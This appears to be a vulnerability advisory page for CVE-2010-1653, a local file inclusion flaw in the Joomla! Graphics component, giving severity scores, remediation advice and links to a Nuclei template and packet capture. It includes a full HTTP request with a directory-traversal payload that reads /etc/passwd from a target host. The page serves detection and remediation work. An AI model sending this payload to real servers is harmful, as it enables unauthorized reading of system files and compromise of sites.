🔙 목록으로 돌아가기

CVE-2010-1653: Joomla! Component Graphics 1.0.6 - Local File Inclusion

TitleJoomla! Component Graphics 1.0.6 - Local File Inclusion
Authordaffainfo
SeverityHigh
ImpactThe LFI vulnerability can lead to unauthorized access to sensitive files, remote code execution, and compromise of the entire Joomla! installation.
RemediationUpdate Joomla! Component Graphics to the latest version or apply the patch provided by the vendor to mitigate the LFI vulnerability.
CVSS Score7.5
EPSS Score0.05171
CVE IDCVE-2010-1653
CWE IDCWE-22
Tags cve cve2010 edb packetstorm joomla lfi htmlcoderhelper vuln

🔍 Vulnerability Description

A directory traversal vulnerability in graphics.php in the Graphics (com_graphics) component 1.0.6 and 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.

🌐 HTTP Request

GET /index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-1653.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-1653.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A